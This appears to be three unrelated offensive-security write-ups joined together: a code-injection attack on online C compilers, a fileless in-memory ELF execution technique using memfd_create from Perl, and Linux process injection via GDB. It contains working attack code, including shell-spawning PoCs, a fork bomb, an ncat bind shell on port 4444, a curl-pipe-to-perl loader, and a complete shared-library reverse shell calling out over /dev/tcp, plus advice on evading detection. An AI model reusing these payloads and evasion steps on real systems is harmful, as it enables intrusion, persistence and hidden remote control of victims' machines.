Vulnerability description


Gaining access

In several of the C/C++ compilers that I analyzed, the getenv() and system() functions allow an attacker to study the remote machine and execute arbitrary commands on it. The getenv() function lets a hacker learn information about the machine that is otherwise concealed from the web interface, such as the username and OS version.

Once this information is revealed, the attacker can begin testing various exploits to achieve privilege escalation and gain access to a root shell. For example, the system() command can be used to execute malicious code and access sensitive data such as logs, website files, etc.

Since the exploit I discovered involves inserting hostile commands to gain control of an unwitting machine, this attack vector is classified as a “code injection” vulnerability.

 

Maintaining control

If a hacker had to re-run the online compiler every time they wanted to send a new command, the attack would leave an obvious trace, and the resource use might draw attention to the suspicious activity. These obstacles can be conveniently sidestepped by using the execl() function, which allows the user to specify any arbitrary program to replace the current process. An attacker can gain access to the machine's built-in shell by invoking the execl() function to replace the current process with /bin/sh, with catastrophic implications.

Many compilers allow input from the browser, in which case the hacker can craft a program to relay input commands to the shell of the compromised machine. Once the hacker uses execl() to open a shell via browser, they can simply operate the remote machine using system() to inject various instructions. This avoids the need to run the compiler each time the attacker wishes to explore or exploit the compromised machine.
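A minimal relay of that kind might look like the sketch below (illustrative only, not code taken from any particular compiler): it reads lines from standard input, which the compromised front end forwards, and hands each one to system():

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
	char cmd[1024];

	/* Forward every line arriving on stdin to the host's shell. */
	while (fgets(cmd, sizeof(cmd), stdin) != NULL) {
		cmd[strcspn(cmd, "\n")] = '\0';	/* strip the trailing newline */
		if (cmd[0] != '\0')
			system(cmd);
	}
	return 0;
}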

Implications


A hacker that obtains shell access in this way gains access to files and services typically protected from outside users. The attacker now has many options at their disposal for exploiting the machine and/or wreaking havoc; how they proceed will depend on their tools and motives.

If the attacker wishes to crash the target machine, they can achieve this by (mis)using the fork() function, which creates a new clone of the current process. A fork() call placed within a while (true) loop will execute indefinitely, repeatedly cloning the process and greedily consuming precious RAM. This rapid, uncontrolled use of resources will overwhelm the machine, causing a self-inflicted denial of service.
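The classic form is nothing more than a fork() inside an infinite loop; a sketch follows (only ever run something like this in a disposable VM):

#include <unistd.h>

int main(void)
{
	/* Each pass through the loop doubles the number of processes,
	 * quickly exhausting process slots and memory. */
	for (;;)
		fork();
	return 0;
}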

Instead of maliciously crashing a machine, an attacker may wish to monetize their illicit access. This can be accomplished by injecting a cryptocurrency miner, which will generate funds for the attacker at the expense of the victim’s computational resources and electric bill. My analysis showed that this maneuver allows useful exploitation of online compilers that successfully stymied other attacks by sandboxing the environment or adopting more advanced techniques to limit file access.

Theory


This section documents the commands used to gain and maintain access to the online compiler. These functions require the unistd.h and stdlib.h libraries.

execl()
Declaration
int execl(const char *pathname, const char *arg, ...);
Parameters

pathname — char*, the name of the program

arg — char*, arguments passed to the program, specified by pathname

Description

The execl() function replaces the current process with a new process. This is the command exploited to maintain control over the remote machine without having to repeatedly use the online compiler. Reference the underlying execve() function for more details.

 

system()
Declaration
int system (const char* command);
Parameters

command — char* command name

Description

The C system function passes the command name, specified by command, to the host's built-in shell (/bin/sh for UNIX-based systems), which executes it. Conceptually, system() behaves as if it executed:

execl("/bin/sh", "sh", "-c", command, (char *)0);
Return

The function returns the termination status of the command once it has finished. If a child process could not be created, or its status could not be retrieved, it returns the value -1.

getenv()
Declaration
char *getenv(const char *name)
Parameters

name — const char* variable name.

Description

Retrieves a string containing the value of the environment variable whose name is specified as an argument ( name ).

Return

The function returns the contents of the requested environment variable as a string. If the requested variable is not part of the environment, the function returns a null pointer.
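As a quick illustration (a sketch; which variables are actually set depends on the compiler's host environment), a probe might look like this:

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
	/* Print a few environment variables of the machine running the compiler. */
	const char *user = getenv("USER");
	const char *path = getenv("PATH");

	printf("USER=%s\n", user ? user : "(unset)");
	printf("PATH=%s\n", path ? path : "(unset)");
	return 0;
}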

Proof of Concepts


/* PoC 1: replace the compiler's process with an interactive shell */
#include <stdio.h>
#include <unistd.h>

int main(){
	execl("/bin/sh", "sh", (char *)NULL); // Open the shell
	return 0;
}

/* PoC 2: run arbitrary shell commands (a separate program) */
#include <stdio.h>
#include <stdlib.h>

int main(){
	system("whoami"); // Find username
	system("cd / && ls"); // List all files and directories on /
	return 0;
}

Solutions


Thankfully, most of the risks highlighted above can be mitigated relatively easily. Access to protected files and services can be prevented by creating a secure sandbox for the application. This minimizes the potential for collateral damage and inappropriate data access, but will not prevent some attacks such as cryptocurrency miner injection. In order to avoid these "mining" attacks, the sandbox should have limited resources and it should be able to reboot itself every 10 minutes.

To eliminate the underlying weakness, the libraries could be recompiled without the particular exploitable functions. An attacker cannot gain a foothold if execl() and system() are removed or disabled by recompiling the libraries.


In-Memory-Only ELF Execution (Without tmpfs)

In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).

Introduction

Every so often, it’s handy to execute an ELF binary without touching disk. Normally, putting it somewhere under /run/user or something else backed by tmpfs works just fine, but, outside of disk forensics, that looks like a regular file operation. Wouldn’t it be cool to just grab a chunk of memory, put our binary in there, and run it without monkey-patching the kernel, rewriting execve(2) in userland, or loading a library into another process?

Enter memfd_create(2). This handy little system call is something like malloc(3), but instead of returning a pointer to a chunk of memory, it returns a file descriptor which refers to an anonymous (i.e. memory-only) file. This is only visible in the filesystem as a symlink in /proc/<PID>/fd/ (e.g. /proc/10766/fd/3), which, as it turns out, execve(2) will happily use to execute an ELF binary.

The manpage has the following to say on the subject of naming anonymous files:

The name supplied in name [an argument to memfd_create(2)] is used as a filename and will be displayed as the target of the corresponding symbolic link in the directory /proc/self/fd/. The displayed name is always prefixed with memfd: and serves only for debugging purposes. Names do not affect the behavior of the file descriptor, and as such multiple files can have the same name without any side effects.

In other words, we can give it a name (to which memfd: will be prepended), but what we call it doesn’t really do anything except help debugging (or forensicing). We can even give the anonymous file an empty name.

Listing /proc/<PID>/fd, anonymous files look like this:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ ls -l /proc/10766/fd
total 0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 30 23:23 3 -> /memfd:kittens (deleted)
lrwx------ 1 stuart stuart 64 Mar 30 23:23 4 -> /memfd: (deleted)

Here we see two anonymous files, one named kittens and one without a name at all. The (deleted) is inaccurate and looks a bit weird but c’est la vie.

Caveats

Unless we land on target with some way to call memfd_create(2) from our initial vector (e.g. injection into a Perl or Python program with eval()), we'll need a way to execute system calls on target. We could drop a binary to do this, but then we've failed to achieve fileless ELF execution. Fortunately, Perl's syscall() solves this problem for us nicely.

We’ll also need a way to write an entire binary to the target’s memory as the contents of the anonymous file. For this, we’ll put it in the source of the script we’ll write to do the injection, but in practice pulling it down over the network is a viable alternative.

As for the binary itself, it has to be, well, a binary. Running scripts starting with #!/interpreter doesn’t seem to work.

The last thing we need is a sufficiently new kernel. Anything version 3.17 (released 05 October 2014) or later will work. We can find the target’s kernel version with uname -r.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ uname -r
4.4.0-116-generic

On Target

Aside from execve(2)ing an anonymous file instead of a regular filesystem file and doing it all in Perl, there isn't much difference from starting any other program. Let's have a look at the system calls we'll use.

memfd_create(2)

Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we're using Perl's syscall() to call memfd_create(2), we don't have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we'll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC               0x0001U
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a constant 0x0001U (i.e. 1, in linux/memfd.h). Now that we've got the numbers we need, we're almost ready to do the Perl equivalent of C's fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead.

Putting it together, let’s finally make our anonymous file:

my $name = "";
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
        die "memfd_create: $!";
}

We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'
total 0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted)

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it.

Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle:

open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);

We now have a file handle which refers to our anonymous file.

Next we need to make our binary available to Perl, so we can write it to the anonymous file. We'll turn the binary into a bunch of Perl print statements, each of which writes a chunk of our binary to the anonymous file.

perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary

This will give us many, many lines similar to:

print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/;
print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/;
print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/;

Executing those puts our ELF binary into memory. Time to run it.

Optional: fork(2)

Ok, fork(2) isn't actually a plain system call; it's really a libc function which does all sorts of stuff under the hood. Perl's fork() is functionally identical to libc's as far as process-making goes: once it's called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don't actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it's the way to go. In general, using fork() to spawn multiple children looks something like:

while ($keep_going) {
        my $pid = fork();
        if (-1 == $pid) { # Error
                die "fork: $!";
        }
        if (0 == $pid) { # Child
                # Do child things here
                exit 0;
        }
}

Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate:

# Spawn child
my $pid = fork();
if (-1 == $pid) { # Error
        die "fork1: $!";
}
if (0 != $pid) { # Parent terminates
        exit 0;
}
# In the child, become session leader
if (-1 == syscall(112)) {
        die "setsid: $!";
}

# Spawn grandchild
$pid = fork();
if (-1 == $pid) { # Error
        die "fork2: $!";
}
if (0 != $pid) { # Child terminates
        exit 0;
}
# In the grandchild here, do grandchild things

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating the current process and swapping out the new clone's program with what should be running, and on Linux it's no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albeit with easier syntax.

We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else.

The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!";

The new process won't have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the /proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list:

cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"'

This will run Perl, renamed in the process list to /sbin/iscsid, with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to Perl's stdin via our local SSH client. The end result is that our script is run without touching disk at all.

Without creds but with access to the target (i.e. after exploiting our way on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl's stdin and Perl gets an EOF when the script's all read, it doesn't particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink.

If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2).

Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast.

In C (translate to your non-disk-touching language of choice), the steps are as follows; a fleshed-out sketch comes after the list:

  1. fd = memfd_create("", MFD_CLOEXEC);
  2. write(fd, elfbuffer, elfbuffer_len);
  3. asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL);
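Here is that sketch fleshed out a little, assuming glibc 2.27+ (which exposes a memfd_create() wrapper in <sys/mman.h>); elf and elf_len stand in for the binary image you already hold in memory, and the function name is made up:

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>

/* Write an in-memory ELF image to an anonymous file and execve(2) it. */
int run_from_memory(const unsigned char *elf, size_t elf_len,
                    char *const argv[], char *const envp[])
{
	int fd = memfd_create("", MFD_CLOEXEC);
	if (fd < 0)
		return -1;

	size_t off = 0;
	while (off < elf_len) {
		ssize_t n = write(fd, elf + off, elf_len - off);
		if (n < 0)
			return -1;
		off += (size_t)n;
	}

	char path[64];
	snprintf(path, sizeof(path), "/proc/self/fd/%d", fd);
	execve(path, argv, envp);
	return -1;	/* only reached if execve(2) failed */
}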

Process Injection with GDB

Inspired by excellent CobaltStrike training, I set out to work out an easy way to inject into processes in Linux. There's been quite a lot of experimentation with this already, usually using ptrace(2) or LD_PRELOAD, but I wanted something a little simpler and less error-prone, perhaps trading flexibility for ease-of-use and works-everywhere. Enter GDB and shared object files (i.e. libraries).

GDB, for those who've never found themselves with a bug unsolvable with lots of well-placed printf("Here\n") statements, is the GNU debugger. Its typical use is to poke at a running process for debugging, but it has one interesting feature: it can have the debugged process call library functions. There are two functions we can use to load a library into the program: dlopen(3) from libdl, and __libc_dlopen_mode, libc's own implementation. We'll use __libc_dlopen_mode because it doesn't require the host process to have libdl linked in.

In principle, we could load our library and have GDB call one of its functions. Easier than that is to have the library’s constructor function do whatever we would have done manually in another thread, to keep the amount of time the process is stopped to a minimum. More below.

Caveats

Trading flexibility for ease-of-use puts a few restrictions on where and how we can inject our own code. In practice, this isn’t a problem, but there are a few gotchas to consider.

ptrace(2)

We’ll need to be able to attach to the process with ptrace(2), which GDB uses under the hood. Root can usually do this, but as a user, we can only attach to our own processes. To make it harder, some systems only allow processes to attach to their children, which can be changed via a sysctl. Changing the sysctl requires root, so it’s not very useful in practice. Just in case:

sysctl kernel.yama.ptrace_scope=0
# or
echo 0 > /proc/sys/kernel/yama/ptrace_scope

Generally, it’s better to do this as root.

Stopped Processes

When GDB attaches to a process, the process is stopped. It's best to script GDB's actions beforehand, either with -x and --batch or by echoing commands to GDB, to minimize the amount of time the process isn't doing whatever it should be doing. If, for whatever reason, GDB doesn't restart the process when it exits, sending the process SIGCONT should do the trick.

kill -CONT <PID>

Process Death

Once our library's loaded and running, anything that goes wrong with it (e.g. segfaults) affects the entire process. Likewise, if it writes output or sends messages to syslog, they'll show up as coming from the process. It's not a bad idea to use the injected library as a loader to spawn the actual malware in new processes.

On Target

With all of that in mind, let’s look at how to do it. We’ll assume ssh access to a target, though in principle this can (should) all be scripted and can be run with shell/sql/file injection or whatever other method.

Process Selection

First step is to find a process into which to inject. Let’s look at a process listing, less kernel threads:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# ps -fxo pid,user,args | egrep -v ' \[\S+\]$'
  PID USER     COMMAND
    1 root     /sbin/init
  625 root     /lib/systemd/systemd-journald
  664 root     /sbin/lvmetad -f
  696 root     /lib/systemd/systemd-udevd
 1266 root     /sbin/iscsid
 1267 root     /sbin/iscsid
 1273 root     /usr/lib/accountsservice/accounts-daemon
 1278 root     /usr/sbin/sshd -D
 1447 root      \_ sshd: root@pts/1
 1520 root          \_ -bash
 1538 root              \_ ps -fxo pid,user,args
 1539 root              \_ grep -E --color=auto -v  \[\S+\]$
 1282 root     /lib/systemd/systemd-logind
 1295 root     /usr/bin/lxcfs /var/lib/lxcfs/
 1298 root     /usr/sbin/acpid
 1312 root     /usr/sbin/cron -f
 1316 root     /usr/lib/snapd/snapd
 1356 root     /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
 1358 root     /usr/lib/policykit-1/polkitd --no-debug
 1413 root     /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
 1415 root     /sbin/agetty --noclear tty1 linux
 1449 root     /lib/systemd/systemd --user
 1451 root      \_ (sd-pam)

Some good choices in there. Ideally we’ll use a long-running process which nobody’s going to want to kill. Processes with low pids tend to work nicely, as they’re started early and nobody wants to find out what happens when they die. It’s helpful to inject into something running as root to avoid having to worry about permissions. Even better is a process that nobody wants to kill but which isn’t doing anything useful anyway.

In some cases, something short-lived, killable, and running as a user is good if the injected code only needs to run for a short time (e.g. something to survey the box, grab creds, and leave) or if there’s a good chance it’ll need to be stopped the hard way. It’s a judgement call.

We’ll use 664 root /sbin/lvmetad -f. It should be able to do anything we’d like and if something goes wrong we can restart it, probably without too much fuss.

Malware

More or less any linux shared object file can be injected. We’ll make a small one for demonstration purposes, but I’ve injected multi-megabyte backdoors written in Go as well. A lot of the fiddling that went into making this blog post was done using pcapknock.

For the sake of simplicity, we’ll use the following. Note that a lot of error handling has been elided for brevity. In practice, getting meaningful error output from injected libraries’ constructor functions isn’t as straightforward as a simple warn("something"); return; unless you really trust the standard error of your victim process.

#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

#define SLEEP  120                    /* Time to sleep between callbacks */
#define CBADDR "<REDACTED>"           /* Callback address */
#define CBPORT "4444"                 /* Callback port */

/* Reverse shell command */
#define CMD "echo 'exec >&/dev/tcp/"\
            CBADDR "/" CBPORT "; exec 0>&1' | /bin/bash"

void *callback(void *a);

__attribute__((constructor)) /* Run this function on library load */
void start_callbacks(){
        pthread_t tid;
        pthread_attr_t attr;

        /* Start thread detached (pthread_attr_* return 0 on success) */
        if (0 != pthread_attr_init(&attr)) {
                return;
        }
        if (0 != pthread_attr_setdetachstate(&attr,
                                PTHREAD_CREATE_DETACHED)) {
                return;
        }

        /* Spawn a thread to do the real work */
        pthread_create(&tid, &attr, callback, NULL);
}

/* callback tries to spawn a reverse shell every so often.  */
void *
callback(void *a)
{
        for (;;) {
                /* Try to spawn a reverse shell */
                system(CMD);
                /* Wait until next shell */
                sleep(SLEEP);
        }
        return NULL;
}

In a nutshell, this will spawn an unencrypted, unauthenticated reverse shell to a hardcoded address and port every couple of minutes. The __attribute__((constructor)) applied to start_callbacks() causes it to run when the library is loaded. All start_callbacks() does is spawn a thread to make reverse shells.

Building a library is similar to building any C program, except that -fPIC and -shared must be given to the compiler.

cc -O2 -fPIC -o libcallback.so ./callback.c -lpthread -shared

It’s not a bad idea to optimize the output with -O2 to maybe consume less CPU time. Of course, on a real engagement the injected library will be significantly more complex than this example.

Injection

Now that we have the injectable library created, we can do the deed. First thing to do is start a listener to catch the callbacks:

nc -nvl 4444 #OpenBSD netcat ftw!

__libc_dlopen_mode takes two arguments, the path to the library and the flags as an integer. The path to the library will be visible, so it's best to put it somewhere inconspicuous, like /usr/lib. We'll use 2 for the flags, which corresponds to dlopen(3)'s RTLD_NOW. To get GDB to cause the process to run the function, we'll use GDB's print command, which conveniently gives us the function's return value. Instead of typing the command into GDB, which takes eons in program time, we'll echo it into GDB's standard input. This has the nice side-effect of causing GDB to exit without needing a quit command.

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# echo 'print __libc_dlopen_mode("/root/libcallback.so", 2)' | gdb -p 664
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
...snip...
0x00007f6ca1cf75d3 in select () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) [New Thread 0x7f6c9bfff700 (LWP 1590)]
$1 = 312536496
(gdb) quit
A debugging session is active.

        Inferior 1 [process 664] will be detached.

Quit anyway? (y or n) [answered Y; input not from terminal]
Detaching from program: /sbin/lvmetad, process 664

Checking netcat, we’ve caught the callback:

[stuart@c2server:/home/stuart]
$ nc -nvl 4444
Connection from <REDACTED> 50184 received!
ps -fxo pid,user,args
...snip...
  664 root     /sbin/lvmetad -f
 1591 root      \_ sh -c echo 'exec >&/dev/tcp/<REDACTED>/4444; exec 0>&1' | /bin/bash
 1593 root          \_ /bin/bash
 1620 root              \_ ps -fxo pid,user,args
...snip...

That’s it, we’ve got execution in another process.

If the injection had failed, we'd have seen $1 = 0, indicating __libc_dlopen_mode returned NULL.

Artifacts

There are several places defenders might catch us. The risk of detection can be minimized to a certain extent, but without a rootkit, there’s always some way to see we’ve done something. Of course, the best way to hide is to not raise suspicions in the first place.

Process listing

A process listing like the one above will show that the process into which we've injected malware has funny child processes. This can be avoided by either having the library double-fork a child process to do the actual work or having the injected library do everything from within the victim process.
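A double-fork along those lines might look like the sketch below (illustrative, not part of the example library above): the grandchild ends up reparented to init, so the reverse shell no longer shows up as a child of the victim process.

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Run cmd from a detached grandchild instead of directly from the victim. */
static void run_detached(const char *cmd)
{
	pid_t pid = fork();
	if (pid < 0)
		return;
	if (pid == 0) {			/* child */
		if (fork() == 0) {	/* grandchild does the real work */
			setsid();
			system(cmd);
			_exit(0);
		}
		_exit(0);		/* child exits right away */
	}
	waitpid(pid, NULL, 0);		/* reap the child; the grandchild is orphaned */
}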

Files on disk

The loaded library has to start on disk, which leaves disk artifacts, and the original path to the library is visible in /proc/pid/maps:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cat /proc/664/maps                                                      
...snip...
7f6ca0650000-7f6ca0651000 r-xp 00000000 fd:01 61077    /root/libcallback.so                        
7f6ca0651000-7f6ca0850000 ---p 00001000 fd:01 61077    /root/libcallback.so                        
7f6ca0850000-7f6ca0851000 r--p 00000000 fd:01 61077    /root/libcallback.so
7f6ca0851000-7f6ca0852000 rw-p 00001000 fd:01 61077    /root/libcallback.so            
...snip...

If we delete the library, (deleted) is appended to the filename (i.e. /root/libcallback.so (deleted)), which looks even weirder. This is somewhat mitigated by putting the library somewhere libraries normally live, like /usr/lib, and naming it something normal-looking.

Service disruption

Loading the library stops the running process for a short amount of time, and if the library causes process instability, it may crash the process or at least cause it to log warning messages (on a related note, don’t inject into systemd(1), it causes segfaults and makes shutdown(8) hang the box).

Process injection on Linux is reasonably easy:

  1. Write a library (shared object file) with a constructor.
  2. Load it with echo 'print __libc_dlopen_mode("/path/to/library.so", 2)' | gdb -p <PID>